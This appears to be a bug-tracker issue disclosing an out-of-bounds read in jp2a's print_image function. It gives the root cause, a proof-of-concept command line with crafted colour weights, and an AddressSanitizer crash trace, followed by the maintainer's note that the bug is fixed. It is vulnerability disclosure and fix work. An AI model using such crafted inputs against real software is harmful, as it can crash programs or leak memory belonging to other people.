jp2a "print_image()" buffer-overflow vulnerability

[yangjiageng]

Description:
There is a global-buffer-overflow bugs in jp2a/src/image.c:line 185 in print_image function.
This bug will cause an out-of-bounds read vulnerability.

The arguments--redweight, greenweight and blueweight are only checked "Weights RED+GREEN+BLUE must equal 1.0" in src/options.c line 333.

But if I input a huge argument of --RED but the sum of these three arguments equals to 1.0, the variable pos (src/image.c, line 183) will be more than the intended value.

Therefore, the value of the statement (invert? pos : chars - pos) will exceed 256 (the variable ascii_palette is a array which has 256 elements), so there is a buffer overflow in print_image function.

CommandLine: jp2a beauty.jpeg --red=65532 --green=-65531 --blue=0

==63250==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000073724b at pc 0x0000004f1dc2 bp 0x7ffd4fb0e6b0 sp 0x7ffd4fb0e6a8
READ of size 1 at 0x00000073724b thread T0
#0 0x4f1dc1 in print_image /root/Downloads/PoC/jp2a/src/image.c:185:40
#1 0x4f48c3 in decompress /root/Downloads/PoC/jp2a/src/image.c:447:2
#2 0x4eed95 in main /root/Downloads/PoC/jp2a/src/jp2a.c:103:4
#3 0x7f6d9addeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#4 0x41bc89 in _start (/root/Downloads/PoC/jp2a/src/jp2a+0x41bc89)

Address 0x00000073724b is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow /root/Downloads/PoC/jp2a/src/image.c:185:40 in print_image
Shadow bytes around the buggy address:
0x0000800dedf0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0000800dee40: f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9 f9 f9
0x0000800dee50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee90: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==63250==ABORTING

System Configuration
jp2a 1.0.8
Copyright 2006-2016 Christian Stigen Larsen
Distributed under the GNU General Public License (GPL) v2.

[Talinx]

This has now been fixed: Talinx@a63bdfa
The weights system is now a lot better. Negative values are rejected and the values do not have to sum up to one because jp2a can do that internally.

Thank you for the report!

(jp2a is now maintained here: Talinx/jp2a)